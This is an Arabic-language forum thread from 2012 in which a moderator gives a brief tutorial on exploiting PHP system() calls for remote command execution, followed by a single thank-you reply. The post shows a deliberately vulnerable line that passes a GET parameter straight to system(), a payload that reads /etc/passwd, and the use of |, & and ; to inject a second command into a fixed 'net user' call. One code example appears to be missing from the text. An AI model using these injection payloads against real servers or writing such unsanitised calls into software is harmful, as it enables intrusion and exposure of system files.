منتدى قبيلة البشايره والعرافين الرسمى -من العضيان

عفواًً تم نقل المنتدى على الرابط لتالي http://albshaerh.com/vb/index.php
 
http://pesh.amuالرئيسيةس .و .جالتسجيلدخول

 

 


شاطر | 
 

 تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس

اذهب الى الأسفل 
كاتب الموضوعرسالة
شرقاوي
مشرف عـام
مشرف عـام
avatar

الساعه الان :
ذكر
عدد المساهمات : 229
نقاط : 2907
السٌّمعَة : 6
01/01/1988
تاريخ التسجيل : 09/12/2011
العمر : 30
الموقع : قمة أفرست

تقييمك للمنتدى
تواجدك في المنتدى:
71/105  (71/105)

مُساهمةموضوع: تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس   الثلاثاء مارس 06, 2012 5:01 am

السلام عليكم ورحمة الله وبركـاته

كيف حال الجميع ؟

الجميع يعرف دالة سيستم وثغرات

Remote Command Execution

كود بسيط متل هيك


كود PHP:
system($_GET['red']);
?>

استغلاله هيبقى


كود:file.php?red=cat /etc/passwd
لحد هنا الامور تمام وده شيء بسيط بيتهيالي الكل بيدركه

لكن الجديد في الموضوع لو كان الكود كده



طبعا ده يعمل في ويندوز .. وبمجرد التصفح يديك النتيجة



تمام .. لو تم التصفح وادخال قيمة يوزر متل b0x بالشكل التاني


كود:file.php?red=b0x
هنلاقي انه اعطانا معلومات بمعنى اصبح الامر الجاهز للتنفيذ في php بالشكل التالي


كود:net user b0x
وهذا يكون لك امر جاهز لكن احنا كيف رح نقوم بتغير الامر بمعنى الغاء الامر net user ووضع الامر الخاص فينا

الكركتر البسيط

كود:|
او

كود:&
او

كود: ;
في لينكس وويندوز ..

صورة بعد التطبيق لامر


ver - يظهر اصدار كيرنل الويندوز


وامر

dir - يظهر الملفات و الفولدرز زي امر ls



في لينكس كده تصير

كود:Red.php?red=b0x;cat /etc/passwd
بكده انتهينا
درس خفيف


توقيع : {USERNAME}
الرجوع الى أعلى الصفحة اذهب الى الأسفل
راعي العمود

avatar

الساعه الان :
ذكر
عدد المساهمات : 168
نقاط : 3008
السٌّمعَة : 7
10/07/1989
تاريخ التسجيل : 18/09/2011
العمر : 29

تقييمك للمنتدى
تواجدك في المنتدى:
45/105  (45/105)

مُساهمةموضوع: رد: تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس   الأحد مارس 11, 2012 7:41 pm

شكراًً لك اخي على الموضوع الرائع الله لايهينك

توقيع : {USERNAME}
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
تخطي الاوامر الثابتة في دوال سيستم ويندوز و لينكس
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدى قبيلة البشايره والعرافين الرسمى -من العضيان :: ¦’’ منتديات التقنية ’’ ¦ :: امن المواقع والسيرفات-
انتقل الى: